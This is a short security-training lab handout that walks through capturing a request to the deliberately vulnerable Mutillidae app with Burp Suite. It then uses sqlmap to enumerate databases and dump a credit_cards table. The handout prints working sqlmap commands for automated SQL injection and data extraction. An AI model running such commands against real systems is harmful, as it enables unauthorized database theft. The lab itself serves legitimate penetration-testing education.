Lesson 8 Lab Notes

In this lab we will do the following:
  • Use SQL map to automate SQL Injections.
  • Exploit the Mutillidae database.
  • Grab the sensitive information stored in the database.
CVE Information:

N/A

Module Information:

N/A

Instructions:

Browse to http://172.16.56.2/mutillidae/

Select OWASP Top 10 > A1 - Injection > SQLMAP Target Practice > View Someone's Blog

While in Firefox go to > Preferences > Advanced > Network > Settings > Manual proxy configuration and use localhost:8080 as your proxy

Launch Burp Suite

Go to Proxy > Intercept and make sure you see 'Intercept is on'.

Copy request by using CTRL + A

Open terminal and type gedit /root/sqlmap.request

Paste the request from Burp Suite into the text editor then save and close. Type in the following at the terminal:

sqlmap -r /root/sqlmap.request --threads=2 --dbs

sqlmap -r /root/sqlmap.request --threads=2 -D owasp10 --tables

sqlmap -r /root/sqlmap.request --threads=2 -D owasp10 -T credit_cards --dump

results matching ""

    No results matching ""